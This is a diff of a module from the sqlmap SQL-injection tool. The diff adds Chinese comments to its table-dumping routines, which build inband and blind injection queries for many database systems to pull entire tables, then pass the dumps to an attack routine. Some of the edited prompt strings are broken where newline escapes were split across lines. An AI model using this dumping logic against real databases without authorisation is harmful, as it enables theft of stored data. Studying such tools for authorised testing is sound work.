This class defines entries' enumeration functionalities for plugins. This class defines entries' enumeration functionalities for plugins.
@ -60,9 +78,12 @@ class Entries(object):
def __init__(self): def __init__(self):
pass pass
# 定义dumpTable方法用于转储指定表的条目
def dumpTable(self, foundData=None): def dumpTable(self, foundData=None):
# 强制执行数据库枚举,确保已获取数据库类型
self.forceDbmsEnum() self.forceDbmsEnum()
# 如果没有指定数据库或指定为当前数据库,则获取当前数据库
if conf.db is None or conf.db == CURRENT_DB: if conf.db is None or conf.db == CURRENT_DB:
if conf.db is None: if conf.db is None:
warnMsg = "missing database parameter. sqlmap is going " warnMsg = "missing database parameter. sqlmap is going "
@ -71,65 +92,81 @@ class Entries(object):
logger.warning(warnMsg) logger.warning(warnMsg)
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果指定了数据库
elif conf.db is not None: elif conf.db is not None:
# 如果数据库是属于大写数据库类型,则将其转换为大写
if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
conf.db = conf.db.upper() conf.db = conf.db.upper()
# 如果数据库名包含逗号,则抛出异常,因为只允许一个数据库名
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
# 如果数据库名匹配排除模式,则跳过
if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None: if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None:
infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
return return
# 对数据库名进行安全处理
conf.db = safeSQLIdentificatorNaming(conf.db) or "" conf.db = safeSQLIdentificatorNaming(conf.db) or ""
# 如果指定了表
if conf.tbl: if conf.tbl:
# 如果表名是属于大写数据库类型,则将其转换为大写
if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
conf.tbl = conf.tbl.upper() conf.tbl = conf.tbl.upper()
# 将表名拆分为列表
tblList = conf.tbl.split(',') tblList = conf.tbl.split(',')
# 如果没有指定表
else: else:
# 获取所有表
self.getTables() self.getTables()
# 如果已缓存表信息
if len(kb.data.cachedTables) > 0: if len(kb.data.cachedTables) > 0:
# 获取表列表
tblList = list(six.itervalues(kb.data.cachedTables)) tblList = list(six.itervalues(kb.data.cachedTables))
# 如果表列表嵌套,则解包
if tblList and isListLike(tblList[0]): if tblList and isListLike(tblList[0]):
tblList = tblList[0] tblList = tblList[0]
# 如果指定了数据库但未能获取表信息
elif conf.db and not conf.search: elif conf.db and not conf.search:
errMsg = "unable to retrieve the tables " errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
else: else:
return return
# 对表名列表中的表名进行安全处理
for tbl in tblList: for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
# 遍历表列表
for tbl in tblList: for tbl in tblList:
# 如果检测到键盘中断,则跳出循环
if kb.dumpKeyboardInterrupt: if kb.dumpKeyboardInterrupt:
break break
# 如果表名匹配排除模式,则跳过
if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None: if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None:
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 设置当前表名
conf.tbl = tbl conf.tbl = tbl
# 初始化已转储的表数据
kb.data.dumpedTable = {} kb.data.dumpedTable = {}
# 如果没有传入已发现的列数据
if foundData is None: if foundData is None:
# 清空缓存的列信息
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
# 获取列信息,仅获取列名,并设置转储模式
self.getColumns(onlyColNames=True, dumpMode=True) self.getColumns(onlyColNames=True, dumpMode=True)
# 如果传入了已发现的列数据,则直接使用
else: else:
kb.data.cachedColumns = foundData kb.data.cachedColumns = foundData
try: try:
# 根据数据库类型设置转储表名
if Backend.isDbms(DBMS.INFORMIX): if Backend.isDbms(DBMS.INFORMIX):
kb.dumpTable = "%s:%s" % (conf.db, tbl) kb.dumpTable = "%s:%s" % (conf.db, tbl)
elif Backend.isDbms(DBMS.SQLITE): elif Backend.isDbms(DBMS.SQLITE):
@ -139,6 +176,7 @@ class Entries(object):
else: else:
kb.dumpTable = "%s.%s" % (conf.db, tbl) kb.dumpTable = "%s.%s" % (conf.db, tbl)
# 如果未能获取列信息,则跳过当前表
if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl) warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX.upper() not in conf.db.upper(): if METADB_SUFFIX.upper() not in conf.db.upper():
@ -148,12 +186,16 @@ class Entries(object):
continue continue
# 获取当前表的列信息
columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]
# 对列名列表进行排序
colList = sorted(column for column in columns if column) colList = sorted(column for column in columns if column)
# 如果指定了排除模式,则从列名列表中排除匹配的列
if conf.exclude: if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
# 如果没有可用的列名,则跳过当前表
if not colList: if not colList:
warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX.upper() not in conf.db.upper(): if METADB_SUFFIX.upper() not in conf.db.upper():
@ -161,9 +203,11 @@ class Entries(object):
warnMsg += " (no usable column names)" warnMsg += " (no usable column names)"
logger.warning(warnMsg) logger.warning(warnMsg)
continue continue
# 设置全局变量 kb.dumpColumns 为当前表需要转储的列名列表
kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList] kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList]
# 将列名列表转换为逗号分隔的字符串
colNames = colString = ','.join(column for column in colList) colNames = colString = ','.join(column for column in colList)
# 获取转储表的根查询
rootQuery = queries[Backend.getIdentifiedDbms()].dump_table rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
infoMsg = "fetching entries" infoMsg = "fetching entries"
@ -173,18 +217,22 @@ class Entries(object):
if METADB_SUFFIX.upper() not in conf.db.upper(): if METADB_SUFFIX.upper() not in conf.db.upper():
infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg) logger.info(infoMsg)
# 遍历列名列表,对每个列名进行预处理
for column in colList: for column in colList:
_ = agent.preprocessField(tbl, column) _ = agent.preprocessField(tbl, column)
if _ != column: if _ != column:
colString = re.sub(r"\b%s\b" % re.escape(column), _.replace("\\", r"\\"), colString) colString = re.sub(r"\b%s\b" % re.escape(column), _.replace("\\", r"\\"), colString)
# 初始化条目计数
entriesCount = 0 entriesCount = 0
# 如果存在可用的注入技术,或使用了--direct参数
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 初始化条目列表
entries = [] entries = []
query = None query = None
# 根据数据库类型构建查询语句
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):
@ -247,9 +295,10 @@ class Entries(object):
query = rootQuery.inband.query % (colString, conf.db, tbl) query = rootQuery.inband.query % (colString, conf.db, tbl)
query = agent.whereQuery(query) query = agent.whereQuery(query)
# 如果没有获取到条目,并且查询语句存在,并且没有检测到键盘中断
if not entries and query and not kb.dumpKeyboardInterrupt: if not entries and query and not kb.dumpKeyboardInterrupt:
try: try:
# 执行查询语句,获取条目信息
entries = inject.getValue(query, blind=False, time=False, dump=True) entries = inject.getValue(query, blind=False, time=False, dump=True)
except KeyboardInterrupt: except KeyboardInterrupt:
entries = None entries = None
@ -257,7 +306,7 @@ class Entries(object):
clearConsoleLine() clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase" warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg) logger.warning(warnMsg)
# 如果成功获取到条目
if not isNoneValue(entries): if not isNoneValue(entries):
if isinstance(entries, six.string_types): if isinstance(entries, six.string_types):
entries = [entries] entries = [entries]
@ -266,6 +315,7 @@ class Entries(object):
entriesCount = len(entries) entriesCount = len(entries)
# 遍历每个列名和条目,更新转储的表数据信息
for index, column in enumerate(colList): for index, column in enumerate(colList):
if column not in kb.data.dumpedTable: if column not in kb.data.dumpedTable:
kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()} kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()}
@ -273,19 +323,20 @@ class Entries(object):
for entry in entries: for entry in entries:
if entry is None or len(entry) == 0: if entry is None or len(entry) == 0:
continue continue
# 如果条目是字符串类型
if isinstance(entry, six.string_types): if isinstance(entry, six.string_types):
colEntry = entry colEntry = entry
# 否则,获取指定索引的条目
else: else:
colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u''
maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry)))) maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))))
# 更新最大长度
if maxLen > kb.data.dumpedTable[column]["length"]: if maxLen > kb.data.dumpedTable[column]["length"]:
kb.data.dumpedTable[column]["length"] = maxLen kb.data.dumpedTable[column]["length"] = maxLen
# 添加条目值
kb.data.dumpedTable[column]["values"].append(colEntry) kb.data.dumpedTable[column]["values"].append(colEntry)
# 如果没有转储表数据,并且可以使用盲注方式,且不是直接模式
if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct: if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of " infoMsg = "fetching number of "
if conf.col: if conf.col:
@ -293,7 +344,8 @@ class Entries(object):
infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg) logger.info(infoMsg)
# 构建盲注获取条目计数的查询语句
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):
@ -307,21 +359,22 @@ class Entries(object):
query = agent.whereQuery(query) query = agent.whereQuery(query)
# 执行盲注查询,获取条目计数
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
lengths = {} lengths = {}
entries = {} entries = {}
# 如果条目计数为0
if count == 0: if count == 0:
warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db)
warnMsg += "appears to be empty" warnMsg += "appears to be empty"
logger.warning(warnMsg) logger.warning(warnMsg)
# 初始化长度和条目
for column in colList: for column in colList:
lengths[column] = len(column) lengths[column] = len(column)
entries[column] = [] entries[column] = []
# 如果未能获取条目计数
elif not isNumPosStrValue(count): elif not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of " warnMsg = "unable to retrieve the number of "
if conf.col: if conf.col:
@ -331,7 +384,7 @@ class Entries(object):
logger.warning(warnMsg) logger.warning(warnMsg)
continue continue
# 对于特定数据库
elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA): elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA):
if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA): if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA):
table = tbl table = tbl
@ -339,7 +392,7 @@ class Entries(object):
table = "%s.%s" % (conf.db, tbl) if conf.db else tbl table = "%s.%s" % (conf.db, tbl) if conf.db else tbl
elif Backend.isDbms(DBMS.INFORMIX): elif Backend.isDbms(DBMS.INFORMIX):
table = "%s:%s" % (conf.db, tbl) if conf.db else tbl table = "%s:%s" % (conf.db, tbl) if conf.db else tbl
# 如果是mssql并且没有强制透视
if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting: if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:
warnMsg = "in case of table dumping problems (e.g. column entry order) " warnMsg = "in case of table dumping problems (e.g. column entry order) "
warnMsg += "you are advised to rerun with '--force-pivoting'" warnMsg += "you are advised to rerun with '--force-pivoting'"
@ -369,7 +422,7 @@ class Entries(object):
clearConsoleLine() clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase" warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg) logger.warning(warnMsg)
# 如果没有获取到条目,且没有检测到键盘中断
if not entries and not kb.dumpKeyboardInterrupt: if not entries and not kb.dumpKeyboardInterrupt:
try: try:
retVal = pivotDumpTable(table, colList, count, blind=True) retVal = pivotDumpTable(table, colList, count, blind=True)
@ -382,12 +435,12 @@ class Entries(object):
if retVal: if retVal:
entries, lengths = retVal entries, lengths = retVal
# 对于其他数据库
else: else:
emptyColumns = [] emptyColumns = []
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) indexRange = getLimitRange(count, plusOne=plusOne)
# 如果列的数量小于行数,且大于阈值,则进行空列检查
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
debugMsg = "checking for empty columns" debugMsg = "checking for empty columns"
logger.debug(infoMsg) logger.debug(infoMsg)
@ -398,7 +451,7 @@ class Entries(object):
debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable)
debugMsg += "dumped as it appears to be empty" debugMsg += "dumped as it appears to be empty"
logger.debug(debugMsg) logger.debug(debugMsg)
try: try:
for index in indexRange: for index in indexRange:
for column in colList: for column in colList:
@ -409,7 +462,7 @@ class Entries(object):
if column not in entries: if column not in entries:
entries[column] = BigArray() entries[column] = BigArray()
# 根据不同的数据库类型,构建盲注查询语句
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
@ -428,10 +481,10 @@ class Entries(object):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index) query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index)
query = agent.whereQuery(query) query = agent.whereQuery(query)
# 执行盲注查询,获取值
value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
value = '' if value is None else value value = '' if value is None else value
# 更新最大长度和条目值
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
entries[column].append(value) entries[column].append(value)
@ -440,14 +493,15 @@ class Entries(object):
clearConsoleLine() clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase" warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg) logger.warning(warnMsg)
# 遍历获取到的条目将结果保存到kb.data.dumpedTable中
for column, columnEntries in entries.items(): for column, columnEntries in entries.items():
length = max(lengths[column], len(column)) length = max(lengths[column], len(column))
kb.data.dumpedTable[column] = {"length": length, "values": columnEntries} kb.data.dumpedTable[column] = {"length": length, "values": columnEntries}
# 获取总行数
entriesCount = len(columnEntries) entriesCount = len(columnEntries)
# 如果没有转储表数据或者条目数为0且有权限标识
if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag):
warnMsg = "unable to retrieve the entries " warnMsg = "unable to retrieve the entries "
if conf.col: if conf.col:
@ -456,15 +510,18 @@ class Entries(object):
warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "")
logger.warning(warnMsg) logger.warning(warnMsg)
else: else:
# 保存转储的信息,包括总行数、表名和数据库名
kb.data.dumpedTable["__infos__"] = {"count": entriesCount, kb.data.dumpedTable["__infos__"] = {"count": entriesCount,
"table": safeSQLIdentificatorNaming(tbl, True), "table": safeSQLIdentificatorNaming(tbl, True),
"db": safeSQLIdentificatorNaming(conf.db)} "db": safeSQLIdentificatorNaming(conf.db)}
try: try:
# 对转储的数据进行攻击
attackDumpedTable() attackDumpedTable()
except (IOError, OSError) as ex: except (IOError, OSError) as ex:
errMsg = "an error occurred while attacking " errMsg = "an error occurred while attacking "
errMsg += "table dump ('%s')" % getSafeExString(ex) errMsg += "table dump ('%s')" % getSafeExString(ex)
logger.critical(errMsg) logger.critical(errMsg)
# 将转储的数据传递给dumper
conf.dumper.dbTableValues(kb.data.dumpedTable) conf.dumper.dbTableValues(kb.data.dumpedTable)
except SqlmapConnectionException as ex: except SqlmapConnectionException as ex:
@ -473,40 +530,46 @@ class Entries(object):
logger.critical(errMsg) logger.critical(errMsg)
finally: finally:
# 清空全局变量
kb.dumpColumns = None kb.dumpColumns = None
kb.dumpTable = None kb.dumpTable = None
# 定义dumpAll方法用于转储所有数据库中的所有表的所有条目
def dumpAll(self): def dumpAll(self):
# 如果指定了数据库,但没有指定表,则只转储该数据库下的表
if conf.db is not None and conf.tbl is None: if conf.db is not None and conf.tbl is None:
self.dumpTable() self.dumpTable()
return return
# 如果是MySQL数据库且没有information_schema
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
errMsg = "information_schema not available, " errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0" errMsg += "back-end DBMS is MySQL < 5.0"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
infoMsg = "sqlmap will dump entries of all tables from all databases now" infoMsg = "sqlmap will dump entries of all tables from all databases now"
logger.info(infoMsg) logger.info(infoMsg)
# 清空表和列的全局变量
conf.tbl = None conf.tbl = None
conf.col = None conf.col = None
# 获取所有表
self.getTables() self.getTables()
# 如果有缓存的表信息
if kb.data.cachedTables: if kb.data.cachedTables:
if isinstance(kb.data.cachedTables, list): if isinstance(kb.data.cachedTables, list):
kb.data.cachedTables = {None: kb.data.cachedTables} kb.data.cachedTables = {None: kb.data.cachedTables}
# 遍历数据库和表
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
conf.db = db conf.db = db
for table in tables: for table in tables:
if conf.exclude and re.search(conf.exclude, table, re.I) is not None: if conf.exclude and re.search(conf.exclude, table, re.I) is not None:
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table)
logger.info(infoMsg) logger.info(infoMsg)
continue continue
try: try:
conf.tbl = table conf.tbl = table
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
@ -517,45 +580,57 @@ class Entries(object):
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table)
logger.info(infoMsg) logger.info(infoMsg)
# 定义dumpFoundColumn方法用于转储已发现的列
def dumpFoundColumn(self, dbs, foundCols, colConsider): def dumpFoundColumn(self, dbs, foundCols, colConsider):
message = "do you want to dump found column(s) entries? [Y/n] " message = "do you want to dump found column(s) entries? [Y/n] "
# 询问用户是否要转储已发现的列
if not readInput(message, default='Y', boolean=True): if not readInput(message, default='Y', boolean=True):
return return
dumpFromDbs = [] dumpFromDbs = []
message = "which database(s)?\n[a]ll (default)\n" message = "which database(s)?\
[a]ll (default)\
"
# 构建数据库选项
for db, tblData in dbs.items(): for db, tblData in dbs.items():
if tblData: if tblData:
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[%s]\
" % unsafeSQLIdentificatorNaming(db)
message += "[q]uit" message += "[q]uit"
# 接收用户选择
choice = readInput(message, default='a') choice = readInput(message, default='a')
# 处理用户选择
if not choice or choice in ('a', 'A'): if not choice or choice in ('a', 'A'):
dumpFromDbs = list(dbs.keys()) dumpFromDbs = list(dbs.keys())
elif choice in ('q', 'Q'): elif choice in ('q', 'Q'):
return return
else: else:
dumpFromDbs = choice.replace(" ", "").split(',') dumpFromDbs = choice.replace(" ", "").split(',')
# 遍历数据库
for db, tblData in dbs.items(): for db, tblData in dbs.items():
if db not in dumpFromDbs or not tblData: if db not in dumpFromDbs or not tblData:
continue continue
conf.db = db conf.db = db
dumpFromTbls = [] dumpFromTbls = []
message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) message = "which table(s) of database '%s'?\
message += "[a]ll (default)\n" " % unsafeSQLIdentificatorNaming(db)
message += "[a]ll (default)\
"
# 构建表选项
for tbl in tblData: for tbl in tblData:
message += "[%s]\n" % tbl message += "[%s]\
" % tbl
message += "[s]kip\n" message += "[s]kip\
"
message += "[q]uit" message += "[q]uit"
# 接收用户选择
choice = readInput(message, default='a') choice = readInput(message, default='a')
# 处理用户选择
if not choice or choice in ('a', 'A'): if not choice or choice in ('a', 'A'):
dumpFromTbls = tblData dumpFromTbls = tblData
elif choice in ('s', 'S'): elif choice in ('s', 'S'):
@ -564,80 +639,120 @@ class Entries(object):
return return
else: else:
dumpFromTbls = choice.replace(" ", "").split(',') dumpFromTbls = choice.replace(" ", "").split(',')
# 遍历表
for table, columns in tblData.items(): for table, columns in tblData.items():
if table not in dumpFromTbls: if table not in dumpFromTbls:
continue continue
conf.tbl = table conf.tbl = table
colList = [_ for _ in columns if _] colList = [_ for _ in columns if _]
# 如果指定了排除模式,则排除匹配的列
if conf.exclude: if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
# 设置需要转储的列
conf.col = ','.join(colList) conf.col = ','.join(colList)
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
kb.data.dumpedTable = {} kb.data.dumpedTable = {}
data = self.dumpTable(dbs) data = self.dumpTable(dbs)
# 如果成功转储了数据则传递给dumper
if data: if data:
conf.dumper.dbTableValues(data) conf.dumper.dbTableValues(data)
def dumpFoundTables(self, tables): def dumpFoundTables(self, tables):
# 1. 定义一个消息,询问用户是否要转储发现的表条目
message = "do you want to dump found table(s) entries? [Y/n] " message = "do you want to dump found table(s) entries? [Y/n] "
# 2. 使用 readInput 函数获取用户输入,默认值为 'Y' (是),并将其转换为布尔值
# 如果用户输入 'n' (否) 或者其他非 'y' 的值,则返回 False否则返回 True。
# 如果用户输入为否,则直接返回,不进行后续的转储操作
if not readInput(message, default='Y', boolean=True): if not readInput(message, default='Y', boolean=True):
return return
# 3. 初始化一个空列表 dumpFromDbs用于存储用户选择要转储的数据库
dumpFromDbs = [] dumpFromDbs = []
message = "which database(s)?\n[a]ll (default)\n" # 4. 构建一个消息,用于提示用户选择要转储的数据库,其中 [a]ll (default) 表示默认选择全部数据库
message = "which database(s)?\
[a]ll (default)\
"
# 5. 遍历传入的 tables 字典,该字典的键是数据库名,值是该数据库下的表列表
for db, tablesList in tables.items(): for db, tablesList in tables.items():
# 6. 如果该数据库有表,则将数据库名添加到消息中,并进行安全 SQL 标识符命名处理
if tablesList: if tablesList:
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[%s]\
" % unsafeSQLIdentificatorNaming(db)
# 7. 在消息中添加一个选项 [q]uit允许用户退出
message += "[q]uit" message += "[q]uit"
# 8. 使用 readInput 函数获取用户输入,默认值为 'a',表示选择全部数据库
choice = readInput(message, default='a') choice = readInput(message, default='a')
# 9. 如果用户没有输入或者输入为 'a' (或 'A'),则将所有数据库添加到 dumpFromDbs 列表中
if not choice or choice.lower() == 'a': if not choice or choice.lower() == 'a':
dumpFromDbs = list(tables.keys()) dumpFromDbs = list(tables.keys())
# 10. 如果用户输入为 'q' (或 'Q'),则直接返回,不进行后续的转储操作
elif choice.lower() == 'q': elif choice.lower() == 'q':
return return
# 11. 否则,将用户输入的数据库名按逗号分割,并添加到 dumpFromDbs 列表中
else: else:
dumpFromDbs = choice.replace(" ", "").split(',') dumpFromDbs = choice.replace(" ", "").split(',')
# 12. 遍历 tables 字典,键是数据库名,值是该数据库下的表列表
for db, tablesList in tables.items(): for db, tablesList in tables.items():
# 13. 如果当前数据库不在 dumpFromDbs 列表中,或者当前数据库没有表,则跳过该数据库
if db not in dumpFromDbs or not tablesList: if db not in dumpFromDbs or not tablesList:
continue continue
# 14. 将当前数据库名赋值给 conf.db (全局配置参数)
conf.db = db conf.db = db
